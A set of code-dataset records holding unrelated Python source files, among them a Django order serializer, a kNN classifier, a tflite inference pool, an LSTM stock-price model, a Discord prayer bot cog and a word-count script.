\"COMPLETED\")\n\n\nclass OrderPreviewSerializer(serializers.ModelSerializer):\n vendor = VendorPreviewSerializer(read_only=True)\n buyer = VendorPreviewSerializer(read_only=True)\n product = ProductPreviewSerializer(read_only=True)\n\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n ]\n\n\nclass OrderDetailSerializer(FlexFieldsModelSerializer):\n # order = OrderPreviewSerializer(read_only=True)\n\n class Meta:\n model = OrderDetail\n fields = [\n \"id\",\n \"full_name\",\n \"email\",\n \"phone_number\",\n \"country\",\n \"zipcode\",\n \"town_or_city\",\n \"street_address1\",\n \"street_address2\",\n \"county\",\n \"created_at\",\n \"updated_at\",\n \"stripe_pid\",\n \"order\",\n ]\n\n\nclass OrderDetailReadSerializer(FlexFieldsModelSerializer):\n class Meta:\n model = OrderDetail\n fields = \"__all__\"\n\n\nclass OrderFullSerializer(serializers.ModelSerializer):\n vendor = VendorPreviewSerializer(read_only=True)\n buyer = VendorPreviewSerializer(read_only=True)\n product = ProductPreviewSerializer(read_only=True)\n order_detail = OrderDetailSerializer(many=True, read_only=True)\n\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n \"order_detail\",\n ]\n\n\nclass OrderSerializer(FlexFieldsModelSerializer):\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n \"order_detail\",\n ]\n expandable_fields = {\n \"vendor\": VendorPreviewSerializer,\n \"buyer\": VendorPreviewSerializer,\n \"product\": ProductPreviewSerializer,\n \"order_detail\": OrderDetailReadSerializer,\n }\n extra_kwargs = {\n \"amount\": {\"required\": False},\n \"order_detail\": {\"required\": False},\n }\n\n def validate(self, data):\n \"\"\"\n The validate function checks if the buyer has already made an offer for this product.\n It also ensures that the first offer is never more than the price of the product.\n\n Args:\n self: Access the current instance of the class\n data: Pass in the validated data\n\n Returns:\n The data if it is valid\n \"\"\"\n\n # If it's a post request\n instance = getattr(self, \"instance\", None)\n print(\"instance\", instance)\n if self.context[\"request\"]._request.method == \"POST\":\n\n # Reject offer if buyer has already have a standing offer for the product\n if Order.objects.filter(\n buyer=data[\"buyer\"], product=data[\"product\"]\n ).exists():\n raise MethodNotAllowed(\n {\"message\": \"This product is already in your orders.\"}\n )\n\n # Ensure the first offer is never more than the price of the product\n if float(data[\"amount\"]) > float(data[\"product\"].price):\n raise MethodNotAllowed(\n {\n \"message\": f\"Your offer must not be greater than {data['product'].price}\"\n }\n )\n\n if self.context[\"request\"]._request.method == \"PUT\":\n # Ensure updates to offer amounts are validated only on put requests\n if self.context[\"request\"].user.vendor == instance.buyer:\n if float(data[\"amount\"]) > float(data[\"product\"].price):\n raise MethodNotAllowed(\n {\n \"message\": f\"Your offer must not be greater than {data['product'].price}\"\n }\n )\n\n # Reject offer if product is no longer available\n if not data[\"product\"].is_available:\n raise NotFound({\"message\": \"This product is no longer available.\"})\n\n return data\n\n def create(self, validated_data):\n \"\"\"\n The create function creates a new order instance.\n It takes in the validated_data and uses it to create an Order object.\n The amount is taken from the product price, unless otherwise specified by the user.\n If there is no change in status, then it will be marked as PROCESSING.\n\n Args:\n self: Reference the current instance of the model\n validated_data: Pass in the data that has already been validated by the serializer\n\n Returns:\n The newly created object\n \"\"\"\n request = self.context[\"request\"]\n buyer = request.user.vendor\n\n product = Product.objects.get(id=request.data.get(\"product\"))\n amount = validated_data.get(\"amount\", product.price)\n instance = Order.objects.create(buyer=buyer, product=product, amount=amount)\n\n if float(instance.amount) < float(product.price):\n instance.status = \"OFFERED\"\n if float(instance.amount) == float(product.price):\n instance.status = \"PROCESSING\"\n\n if instance.status == \"PROCESSING\":\n # Mark product as no longer available\n Product.objects.filter(id=instance.product.id).update(is_available=False)\n\n if instance.status == \"OFFERED\":\n # Mark product as still available\n Product.objects.filter(id=instance.product.id).update(is_available=True)\n\n instance.save()\n\n return instance\n\n def update(self, instance, validated_data):\n \"\"\"\n The update function is used to update the status of an order.\n It takes in a request and validated data as arguments.\n The user who made the request is determined by checking if it was a vendor or buyer making the request.\n If it was a vendor, then they can only update their own orders' statuses, otherwise if it was a buyer,\n they can only update their own orders' amounts.\n\n Args:\n self: Access fields and methods of the serializer class\n instance: Get the current object that is being updated\n validated_data: Pass in the data that has been validated by the serializer\n\n Returns:\n The updated instance\n \"\"\"\n\n user = self.context[\"request\"].user.vendor\n\n product_data = validated_data[\"product\"]\n product = Product.objects.get(id=product_data.id)\n\n if user == instance.vendor:\n # seller can update status\n print(\"request is from vendor\")\n instance.status = validated_data.get(\"status\", instance.status)\n print(\"result\", instance.status)\n\n if user == instance.buyer:\n # buyer can update amount\n instance.amount = validated_data.get(\"amount\", instance.amount)\n\n if float(instance.amount) < float(product.price):\n instance.status = \"OFFERED\"\n\n if float(instance.amount) == float(product.price):\n instance.status = \"PROCESSING\"\n\n instance.save()\n\n if instance.status in sold:\n # Mark product as no longer available\n product.is_available = False\n product.save()\n instance.product.is_available = False\n\n if instance.status in available:\n # Mark product as available\n product.is_available = True\n product.save()\n instance.product.is_available = True\n\n instance.product.save()\n return instance\n","repo_name":"israelias/thrift-api","sub_path":"order/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41533208534","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nfrom numpy import *\nimport operator\n\ndef createDataSet():\n \"\"\"\"\"\"\n group = array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\ndef classify0(intX, dataSet, labels, k):\n \"\"\"k-NN algorithm\"\"\"\n # number of rows of the training set.\n dataSetSize = dataSet.shape[0]\n # tile() func creates a matrix whose values are inX and\n # whose size is identical to dataSet.\n # b = time(a, (m,n)),将a复制n次存入c中,再将c复制m次存入b中,如此构造出b。\n # Then do the minus calculation.\n diffMat = tile(intX, (dataSetSize,1)) - dataSet\n # Do the power\n sqDiffMat = diffMat ** 2\n # Do the sum, on the row direction.\n sqDistances = sqDiffMat.sum(axis=1)\n # Do the square root.\n distances = sqDistances ** 0.5\n # Sort and return the index value of the sorted elements.\n # For example, distances = [1.487, 1.414, 0, 0.1]\n # sortedDistIndicies := [2, 3, 1, 0] whose elements' values\n # are indexes of the distances elements.\n # 0 0.1 1.414 1.487\n # d2 d3 d1 d0\n sortedDistIndicies = distances.argsort()\n # A dict\n classCount = {}\n # 对k个点的每一个。\n for i in range(k):\n # 取该点label\n # i=0, sd[0]= 2(见sortedDistIndicies注释)\n # labels[2] = 'B'\n # voteIlabel := 'B'\n voteIlabel = labels[sortedDistIndicies[i]]\n # 计数,出现一次该label就增1\n # 计算k个点中,各标签出现次数。\n # 出现次数最多的标签,就是测试点的分类标签。\n # classCount.get('B', 0), dict.get() 功能如下: classCount中有key'B',\n # 就取其相应value。如果没有,取默认值,本例为0。 这样完成对标签计数。\n # dict.get('name', defaultValue)与dict['name']异同处:\n # \"It allows you to provide a default vlaue if the key is missing.\n # dict.get('name') is same as writing,\n # dict['name'] or None\n # so it implicitly handles keyError exception.\"\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n # 将classCount按第二列(key参数指定),即value列排序,\n # 大值在前(reverse参数指定)。\n # 最终sortedClassCount形如 [('B', 2), ('A', 1)], 是一个list。\n # In python 3, dict.iteritems() is replaced with dict.items.\n # So classCount.items() is correct.\n sortedClassCount = sorted(classCount.items(),\n key=operator.itemgetter(1), reverse=True)\n # sortedClassCount[0], ('B', 2)\n # sortedClasscount[1], ('A', 1)\n # 而返回值sortedClassCount[0][0], 为'B',为该测试记录通过knn计算出的标签\n return sortedClassCount[0][0]\n\n\ndef file2matrix(filename):\n \"\"\"\"\"\"\n with open(filename) as fr:\n arrayOLines = fr.readlines()\n # 记录总条数\n numberOfLines = len(arrayOLines)\n # initialize the return matrix as a zeros matrix.\n returnMat = zeros((numberOfLines, 3))\n # initialize the label vector as empty list.\n classLabelVector = []\n index = 0\n\n # 取每一条记录\n for line in arrayOLines:\n # 去除行前后空格\n line = line.strip()\n # 以tab为分隔符,切分列。\n listFromLine = line.split('\\t')\n # 0 through 2nd column of the training example are features\n returnMat[index,:] = listFromLine[0:3]\n # 3rd (or -1) column of the training example is\n # the classification label\n classLabelVector.append(int(listFromLine[-1]))\n index += 1\n\n return returnMat, classLabelVector\n\ndef autoNorm(dataSet):\n \"\"\"归一化数据,保证特征权值等同。避免值大的features,比值小的features更有\n 影响力。\n newValue = (oldValue - min) / (max - min)\"\"\"\n\n # 0 表明按列取最小、最大值。\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n # 分母\n ranges = maxVals - minVals\n normDataSet = zeros(shape(dataSet))\n m = dataSet.shape[0]\n # 分子,取为矩阵,计算按element-wise方式进行。\n normDataSet = dataSet - tile(minVals, (m, 1))\n # 求归一值\n normDataSet = normDataSet / tile(ranges, (m, 1))\n\n return normDataSet, ranges, minVals\n\ndef datingClassTest():\n \"\"\"测试knn算法\"\"\"\n # Hold ration保留率10%, 数据中90%条记录取为训练集,余10%留为测试集。\n hoRatio = 0.10\n # 自文件读入数据。并将数据列,分为features, label。\n # 最后一列是label,放入dl中, 前面若干列是features,放入ddm中。\n ddm, dl, = file2matrix('datingTestSet2.txt')\n # 将features做归一化处理。\n nm, r , minv = autoNorm(ddm)\n # 训练集矩阵的“行”数。本例1000\n m = nm.shape[0]\n # 测试集数目。本例100\n numTestVecs = int(m * hoRatio)\n # 置错误数初值为0.0\n errorCount = 0.0\n \n # 对每一条测试数据。本例中i取值从0:99\n for i in range(numTestVecs):\n # 比对每一条数据与所有(numTestVecs:m,本例100:1000)训练集记录的knn距离\n # nm是训练集features, dl是训练集label。 k取3。\n classifierResult = classify0(nm[i,:], nm[numTestVecs:m,:], \\\n dl[numTestVecs:m], 3)\n # 比较计算的分类标签与真实的分类标签。\n if (classifierResult != dl[i]):\n # 不一致,分类错误,错误计数增1。\n errorCount += 1.0\n # 并格式化输出\n print(\" TestExample #%d : the label is misclassified as : [%d], the real answer is: [%d]\" \\\n % (i, classifierResult, dl[i]))\n else:\n # 一致,分类正确,格式化输出\n print(\"Test Example #%d : the classifier came back with: %d, the real answer is: %d\" \\\n % (i, classifierResult, dl[i]))\n\n # 总错误计数 / 总测试集记录条数, 即为错误率。\n print(\"The total error rate is: %f\" % (errorCount/float(numTestVecs)))\n\ndef main():\n datingClassTest()\n \nif __name__ == \"__main__\":\n main()\n\n# ============================================================================\n# After reading this knn code, I came up with the idea that maybe something\n# can be done to improve or extend this example.\n# 1. The calculation of distances can be refactored. There are multiple\n# definition variants concerning distances between two points.\n# To be specific, any form of Minkowski distances will do the job.\n# 2. The error rate can be improved using F-score based on precision and\n# recall.\n# 3. autoNorm can be replaced with standard score known as Z-score, due to\n# \"Z-score will be our primary method of normalization.\"\n","repo_name":"cfsmile/PoMLiA","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73173570408","text":"import numpy as np\nimport os, time\nimport tflite_runtime.interpreter as tflite\nfrom multiprocessing import Pool\n\n\n# global, but for each process the module is loaded, so only one global var per process\ninterpreter = None\ninput_details = None\noutput_details = None\ndef init_interpreter(model_path):\n global interpreter\n global input_details\n global output_details\n interpreter = tflite.Interpreter(model_path=model_path)\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n interpreter.allocate_tensors()\n print('done init')\n\ndef do_inference(img_idx, img):\n print('Processing image %d'%img_idx)\n print('interpreter: %r' % (hex(id(interpreter)),))\n print('input_details: %r' % (hex(id(input_details)),))\n print('output_details: %r' % (hex(id(output_details)),))\n\n tstart = time.time()\n\n img = np.stack([img]*3, axis=2) # replicates layer three time for RGB\n img = np.array([img]) # create batch dimension\n interpreter.set_tensor(input_details[0]['index'], img )\n interpreter.invoke()\n\n logit= interpreter.get_tensor(output_details[0]['index'])\n pred = np.argmax(logit, axis=1)[0]\n logit = list(logit[0])\n duration = time.time() - tstart \n\n return logit, pred, duration\n\ndef main_par():\n optimized_graph_def_file = r'float_model.tflite'\n # init model once to find out input dimensions\n interpreter_main = tflite.Interpreter(model_path=optimized_graph_def_file)\n interpreter_main.allocate_tensors()\n input_details = interpreter_main.get_input_details()\n output_details = interpreter_main.get_output_details()\n height = input_details[0]['shape'][1]\n width =input_details[0]['shape'][2]\n floating_model = (input_details[0]['dtype'] == np.float32)\n input_mean = 127.5\n input_std = 127.5\n #input_w, intput_h = tuple(input_details[0]['shape'][1:3])\n vid_path='17-05-46.flv'\n #videostream = FileVideoStream(vid_path).start()\n # videostream=VideoStream(0).start()\n videostream = cv2.VideoCapture(vid_path)\n time.sleep(1)\n fps = FPS().start()\n start_time = time.time()\n frame_count=0\n min_conf_threshold=0.8\n light_thresh=90\n\n num_test_imgs=1000\n # pregenerate random images with values in [0,1]\n test_imgs = np.random.rand(num_test_imgs, input_w,intput_h).astype(input_details[0]['dtype'])\n\n scores = []\n predictions = []\n it_times = []\n\n tstart = time.time()\n with Pool(processes=4, initializer=init_interpreter, initargs=(optimized_graph_def_file,)) as pool: # start 4 worker processes\n\n results = pool.starmap(do_inference, enumerate(test_imgs))\n scores, predictions, it_times = list(zip(*results))\n duration =time.time() - tstart\n\n print('Parent process time for %d images: %.2fs'%(num_test_imgs, duration))\n print('Inference time for %d images: %.2fs'%(num_test_imgs, sum(it_times)))\n print('mean time per image: %.3fs +- %.3f' % (np.mean(it_times), np.std(it_times)) )\n\n\n\nif __name__ == '__main__':\n # main_seq()\n main_par()","repo_name":"FalconMadhab/useful_scripts","sub_path":"tflite_pool.py","file_name":"tflite_pool.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30699443405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 18 23:00:22 2020\n@author: revan\n\"\"\"\n\n#importing libraries\nimport numpy as np \nimport os, sys\nfrom pathlib import Path, PureWindowsPath\n\n#getting data\nfrom pandas_datareader import data as pdr\nfrom datetime import datetime\n\n#data processing\nimport pandas as pd \npd.set_option('display.max_columns', 25)\n\n#data visualization\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom matplotlib import style\n\n#for normalizing data\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0, 1))\n\n#avoid warnings\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#importing RNN libraries\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nfrom keras.models import load_model\n\n#DateTime\nfrom datetime import datetime\n\n#Setting the seed\nimport random\nnp.random.seed(1234)\nimport tensorflow as tf\ntf.random.set_seed(1000)\n#tf.set_random_seed(1000)\n\n#Functions from other files\nfrom check_overfit import get_params\n\n\n#building the model for the price prediction\ndef build_model(train,params,scaled_data_train): \n \n x_train, y_train = [], []\n for i in range(params['offset'],len(train)):\n x_train.append(scaled_data_train[i-params['offset']:i,0])\n y_train.append(scaled_data_train[i,0])\n \n x_train, y_train = np.array(x_train), np.array(y_train)\n x_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)) \n \n #create and fit the LSTM network\n if params['units_2'] != 0:\n \n model = Sequential()\n model.add(LSTM(units=params['units_1'], return_sequences=True, \n input_shape=(x_train.shape[1],1)))\n model.add(Dropout(rate=params['drop_rate_1']))\n model.add(LSTM(units=params['units_2']))\n model.add(Dropout(rate=params['drop_rate_2']))\n model.add(Dense(1)) \n \n else:\n \n model = Sequential()\n model.add(LSTM(units=params['units_1'], return_sequences=False, \n input_shape=(x_train.shape[1],1)))\n model.add(Dropout(rate=params['drop_rate_1']))\n model.add(Dense(1))\n \n model.compile(loss='mean_squared_error', optimizer='adam')\n history = model.fit(x_train, y_train, epochs=params['epochs'], \n batch_size=params['batch_size'], verbose=1)\n \n return model, history\n \n\ndef run(data_df, params): \n \n #Plot the data and check if there are any unexpected anamolies(sudden spikes or dips)\n plt.figure(figsize=(16,8))\n plt.plot(data_df['Close'], label='Close Price history')\n plt.title('Close Price History')\n \n new_data = pd.DataFrame(index=range(0,len(data_df)),columns=['Date', 'Close'])\n for i in range(0,len(data_df)):\n new_data['Date'][i] = data_df.index[i]\n new_data['Close'][i] = data_df['Close'][i]\n \n #setting index\n new_data.index = new_data.Date\n new_data.drop('Date', axis=1, inplace=True)\n \n tl = len(new_data)\n \n dataset = new_data.values\n train = dataset[0:tl,:]\n \n #Normalizing the data\n scaler = MinMaxScaler(feature_range=(0,1))\n scaler.fit(train)\n scaled_data_train = scaler.transform(train)\n \n model, history = build_model(train,params,scaled_data_train)\n \n #return predict(params,new_data,scaler,model)\n return model\n\n\n#'main' program\nif __name__ == '__main__':\n \n #data_df = pd.read_csv('GOOG_2015-04-01_2020-03-31.csv', index_col='Date', parse_dates=True)\n #using pandas_datareader library to get the data from Yahoo-Finance\n start_date = datetime(2015, 4, 2)\n end_date = datetime(2020, 3, 31)\n ticker = 'GOOG'\n \n data_df = pdr.get_data_yahoo(tickers=ticker, start=start_date, end=end_date)\n \n #Defining the initial parameters of the model \n params = get_params() \n \n #this 'result' contains the predicted close prices for the next 30 days (future_days)\n #here our aim is to build model that predicts the future prices\n #this model will be saved for future use\n model = run(data_df, params) \n \n BASE_PATH = os.getcwd()\n script_folder = Path(os.getcwd())\n path = script_folder / 'model.h5'\n \n model.save(path)\n print(\"'model' is saved in the current directory for future use\")\n \n","repo_name":"revanth-talluri/Stock-Price-Prediction","sub_path":"4_building_model.py","file_name":"4_building_model.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4786856388","text":"import pandas as pd\nimport sys\n\ndef USAGE():\n print(\"%s InFile OutFile RefFile Num Identity MInLen MaxLen\"%sys.argv[0])\n\ndef Construct_Region(dat,id,st,end):\n if dat[st] < dat[end]:\n qst,qend = dat[st],dat[end] \n else:\n qst,qend = dat[end],dat[st]\n return(\"%s:%d-%d\"%(dat[id],qst,qend))\n\nif len(sys.argv) <3:\n USAGE()\n sys.exit(1)\n\ndef Construct_Region(dat,id,st,end):\n if dat[st] < dat[end]:\n qst,qend = dat[st],dat[end] \n else:\n qst,qend = dat[end],dat[st]\n return(\"%s:%d-%d\"%(dat[id],qst,qend))\n\ndef Cds2Group(x,search_d):\n #cds_nam = \"_\".join(x.split(\"_\")[0:2])\n group = search_d.get(x,\"Unknown\")\n return(group)\n\n\n\nprint(sys.argv)\n\nInFile = sys.argv[1]\nOutFile = sys.argv[2]\nRefFile = sys.argv[3]\nNum = int(sys.argv[4])\nIdentity = 95 if len(sys.argv) <6 else int(sys.argv[5])\nmin_len = 100 if len(sys.argv) <7 else int(sys.argv[6])\nmax_len = 1450 if len(sys.argv) <8 else int(sys.argv[7])\n\nRef = open(RefFile,\"r\")\ndat = Ref.readlines()\nRef.close()\ndat_list = [x.strip().split(\"\\t\") for x in dat]\ngroup_dict = dict(zip([x[1].split(\"|\")[1] for x in dat_list],[x[0] for x in dat_list]))\n\ncolname = [\"qseqid\",\"sseqid\",\"pident\",\"length\",\"mismatch\",\"gapopen\",\"qstart\",\"qend\",\"sstart\",\"send\",\"evalue\",\"bitscore\"]\ndf = pd.read_table(InFile,header=None,names=colname)\ndf.iloc[:,2:12] = df.iloc[:,2:12].astype(int)\n\ndf_con = df[(df[\"pident\"] >= Identity) &(df[\"length\"] >min_len)&(df[\"length\"] < max_len)]\ndf_con[\"qsp\"] = df_con[\"qseqid\"].apply(lambda x:group_dict.get(x.split(\"|\")[1],\"Unknown\"))\n\nall_sp = df_con[\"qsp\"].tolist()\ndf_con_new = df_con\n\ndf_con_new = df_con_new.reset_index().drop([\"index\"],axis=1)\n# region define\n#df_con[\"q-reg\"] = df_con.apply(lambda x:Construct_Region(x,\"qid\",\"qstart\",\"qend\"),axis=1)\ndf_con_new[\"s-reg\"] = df_con_new.apply(lambda x:Construct_Region(x,\"sseqid\",\"sstart\",\"send\"),axis=1)\ndf_con_re = (df_con_new.loc[:,\"s-reg\"]).to_frame(name=\"Uniq_reg\")\ndf_con_re.drop_duplicates(inplace=True) ## duplicate reg,left uniq region\n\n## reconstruct region datafram\ndf_con_re[\"ID\"] = df_con_re[\"Uniq_reg\"].apply(lambda x:x.split(\":\")[0])\ndf_con_re[\"start\"] = df_con_re[\"Uniq_reg\"].apply(lambda x:x.split(\":\")[1].split(\"-\")[0])\ndf_con_re[\"end\"] = df_con_re[\"Uniq_reg\"].apply(lambda x:x.split(\":\")[1].split(\"-\")[1])\ndf_con_re[\"length\"] = df_con_re.apply(lambda x:int(x[\"end\"]) - int(x[\"start\"]),axis=1)\ndf_con_re = df_con_re.reset_index().drop([\"index\"],axis=1)\ndf_con_re.iloc[:,2:] = df_con_re.iloc[:,2:].astype(int)\n\nref_dic = {}\nfor i in df_con_new.index:\n ref_key = df_con_new.loc[i,\"s-reg\"]\n if ref_key in ref_dic.keys():\n ref_dic[ref_key] = ref_dic[ref_key]+\",\"+df_con_new.loc[i,\"qsp\"]\n else:\n ref_dic[ref_key] = df_con_new.loc[i,\"qsp\"]\n\n\nnew_ref= {}\nfor k,v in ref_dic.items():\n ref_dic[k] = v.split(\",\")\n new_ref[k] = set(v.split(\",\"))\n\ndf_stat = pd.DataFrame(ref_dic.keys(),columns=[\"Ref_Gene\"])\nAll_sp_len = len(set(df_con_new[\"qsp\"]))\nfor i in df_stat.index:\n ref = df_stat.loc[i,\"Ref_Gene\"]\n df_stat.loc[i,\"Exist Num\"] = len(ref_dic[ref])\n df_stat.loc[i,\"Uni Num\"] = len(new_ref[ref])\ndf_stat[\"dup rate\"] = df_stat.apply(lambda x:round(int(x[\"Exist Num\"])/All_sp_len,3),axis=1)\ndf_stat[\"perc\"] = df_stat.apply(lambda x:round(int(x[\"Uni Num\"])/All_sp_len,3),axis=1)\ndf_stat = df_stat[df_stat[\"perc\"] > 0.1]\n\nSelectNum = Num if len(df_stat) >Num else len(df_stat)\ndf_final = df_stat.sort_values([\"perc\"],ascending=False)[:SelectNum]\n\ndf_final = pd.merge(df_final,df_con_re,left_on=\"Ref_Gene\",right_on=\"Uniq_reg\").drop([\"Uniq_reg\"],axis=1)\ndf_final.to_csv(OutFile,sep=\"\\t\",index=False)","repo_name":"zhengxingSong/BacteriaPrimer","sub_path":"GenusPrimer/bin/A1.1_Extract_Orth_GeneV3.py","file_name":"A1.1_Extract_Orth_GeneV3.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71229904488","text":"\ndef sort(numbers):\n for i in range(0, len(numbers)-1):\n for j in range(i+1, len(numbers)):\n if numbers[i] > numbers[j]:\n aux = numbers[i]\n numbers[i]=numbers[j]\n numbers[j]=aux\n\nnumbers = [25,2,8,-6,4,3,2]\nprint(\"Colectie de numere nesortate:{}\".format(numbers))\nsort(numbers)\nprint(\"Colectie de numere dupa aplicarea algoritmului de sortare:{}\".format(numbers))","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Algoritmi de sortare/Selection sort.py","file_name":"Selection sort.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9555279442","text":"#\n# This file is part of application-utility.\n#\n# application-utility is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# application-utility is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with application-utility. If not, see .\n#\n# Authors: fhdk\n#\n\n\"\"\"application-utility Text Module\"\"\"\n\nfrom application_utility.translation import i18n\n\n_ = i18n.language.gettext\n# gitlab\nGITLAB = \"https://gitlab.manjaro.org/\"\nOFFICIAL_ISO_URL = GITLAB + \"profiles-and-settings/iso-profiles/raw/manjaro-architect/manjaro\"\nCOMMUNITY_ISO_URL = GITLAB + \"profiles-and-settings/iso-profiles/raw/manjaro-architect/community\"\n# header\nMAM = _(\"Manjaro Application Maintenance\")\nMAU = _(\"Manjaro Application Utility\")\nSELECT_APPS = _(\"Select/Deselect apps you want to install/remove\")\nWHEN_READY = _(\"when ready\")\n# buttons\nBTN_ADVANCED = _(\"advanced\")\nBTN_ADVANCED_TIP = _(\"Toggle an extended selection of packages\")\nBTN_DOWNLOAD = _(\"download\")\nBTN_DOWNLOAD_TIP = _(\"Download the most recent selection of packages\")\nBTN_RESET = _(\"reset\")\nBTN_RESET_TIP = _(\"Reset your current selections...\")\nBTN_UPDATE_SYSTEM = _(\"UPDATE SYSTEM\")\nBTN_UPDATE_SYSTEM_TIP = _(\"Apply your current selections to the system\")\nBTN_CLOSE = _(\"close\")\nBTN_CLOSE_TIP = _(\"Discard selections and close app\")\n# tree view columns\nCOL_GROUP = _(\"Group\")\nCOL_APPLICATION = _(\"Application\")\nCOL_DESCRIPTION = _(\"Description\")\nCOL_ACTION = _(\"Install/Remove\")\nPKG_INSTALLED_TIP = _(\"Installed\")\nPKG_REMOVE_TIP = _(\"to remove\")\n# message\nSELECTION_RESET = _(\"Your selections has been reset\")\nDOWNLOAD_COMPLETE = _(\"App data has been downloaded and list is reset\")\nSYSTEM_UPDATED = _(\"Your system has been updated\")\nDOWNLOAD_NA = _(\"Download not available\")\nSERVER_NA = _(\"server could not be reached\")\n","repo_name":"fhdk/application-utility","sub_path":"application_utility/constants/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1456555683","text":"'''\nCreated: 9/1/2018\nBy: Mason Seeger\n\nYASL - Yet Another Simple Language\n\nAs of now this program is a lexicon for a simple programming language.\n\nUsing Windows ctrl+z gives end of file\n'''\nimport sys\nfrom Scanner import Scanner\nfrom Token import Token\nfrom Parser import Parser\nfrom Interpreter import Interpreter\n\ndef eofFound(SC):\n if(SC.state==-10):\n return(-1)\n\ndef main():\n fileName = sys.argv[1]\n f = open(fileName, 'r')\n eof = 0\n\n try:\n SC = Scanner(f)\n parser = Parser(SC)\n program = parser.S()\n interpreter = Interpreter(program)\n interpreter.interpProgram()\n #program.display(0)\n\n except EOFError:\n eof = Token('EOF', ' ', [SC.position[0],1])\n\n if eof: #EOF found as the first thing in a line\n print(\"in eof\")\n if(SC.state ==-3):\n print(\"error, no */ found before EOF\")\n print(eof.information())\n elif not(parser.ok):\n print(\"error in the parser, currently an undefined identifier\")\n print(\"ending the program \")\n\n #print(parser.consts)\n\nif __name__ == '__main__':\n main()\n","repo_name":"masonseeger/YASL-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70629136170","text":"from disnake import ApplicationCommandInteraction\nfrom disnake.ext import commands, tasks\nfrom config.messages import Messages\nfrom datetime import time, datetime\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv(dotenv_path=\"./config/.env\")\n\n\nclass Praying(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n self.send_pray.start()\n\n local_tz = datetime.now().astimezone().tzinfo\n\n @commands.slash_command(description=Messages.pray_brief)\n async def pray(self, inter: ApplicationCommandInteraction):\n await inter.send(Messages.pray_string)\n\n @tasks.loop(time=time(int(os.getenv(\"PRAYING_HOUR\")), int(os.getenv(\"PRAYING_MINUTE\")), tzinfo=local_tz))\n async def send_pray(self):\n modlitebna = self.bot.get_channel(int(os.getenv(\"MODLITEBNA_ROOM\")))\n await modlitebna.send(Messages.pray_string)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Praying(bot))\n","repo_name":"lukynmatuska/Ministrant","sub_path":"cogs/praying.py","file_name":"praying.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19250913753","text":"\nfrom psyLex.readDict import *\nfrom psyLex.wordCount import *\nimport sys\n\n# It goes like this: accepts three command line arguments: (1) mode - see below - (2) text to analyze (file vs. raw text), and (3) the path to the dictionary file we should use.\ninMode = sys.argv[1]\ninValue = sys.argv[2]\ninDict = sys.argv[3]\n\ndictIn = readDict(inDict)\n\n# Currently supports two modes: basic text (entered as a command-line argument) and file-based (will read a whole frakin' file).\n# If basic text mode, just assign the input value the value of the second command line argument.\nif inMode == \"0\":\n inData = inValue\n# If file mode, read the file into a string.\nelif inMode == \"1\":\n with open (inValue, \"r\") as myfile:\n inData=myfile.read().replace('\\n', ' ')\n\n# Run the wordCount function using the specified parameters.\nout = wordCount(inData, dictIn)\n\n#print(out[0].items())\n\nfor k, v in out[0].items():\n\tprint(k + \": \" + str(v))\n","repo_name":"seanrife/psyLex","sub_path":"psyLex.py","file_name":"psyLex.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} 